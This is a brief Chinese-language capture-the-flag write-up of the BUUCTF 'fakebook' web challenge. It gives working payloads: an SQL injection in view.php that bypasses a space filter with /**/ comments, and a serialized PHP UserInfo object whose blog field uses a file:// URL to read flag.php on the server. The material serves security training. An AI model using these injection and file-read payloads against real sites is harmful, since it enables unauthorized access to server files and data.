2019-10-22 BUUCTF Web fakebook WriteUp

废话：好久没写WP了（WTM忘了......）

第一步，发现view.php存在SQL注入，简单的过滤了空格，用/**/代替绕过。
payload:
?no=0/**/union/**/select/**/1,2,3,4#
发现报错，unserialize()说明数据以序列化字符串存储，报错信息暴露了网站目录：/var/www/html/
利用curl不仅可以http、https还可使用file协议的特性，构造反序列字符串即可
第二步，祭出目录扫描器，发现robot.txt里有信息，存在user.php.bak源码泄露
利用user.php成功构造序列化字符串
O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}
payload:

/view.php?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}'#

访问发现读取栏没变化，可把我慌了，查看源代码

源码.png

base64解码后成功得到FLAG